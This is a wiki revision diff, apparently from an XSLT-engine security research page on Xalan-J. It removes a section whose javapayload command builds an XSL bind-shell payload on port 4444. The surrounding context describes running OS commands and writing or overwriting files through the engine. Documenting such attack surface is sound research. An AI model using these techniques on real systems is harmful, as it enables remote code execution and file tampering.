Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version Icon 74.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 11:59
Change comment: There is no comment for this version
To version Icon 75.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 12:00
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -77,16 +77,6 @@
77 77  
78 78  It is of course possible to include commands for multiples OS in one file and to execute only the relevant ones.
79 79  
80 -= Executing arbitrary classes =
81 -
82 --- It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-( --
83 -
84 -{{warning}}
85 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
86 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh
87 -Check supported versions of Xalan !
88 -{{/warning}}
89 -
90 90  = File creation =
91 91  
92 92  The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.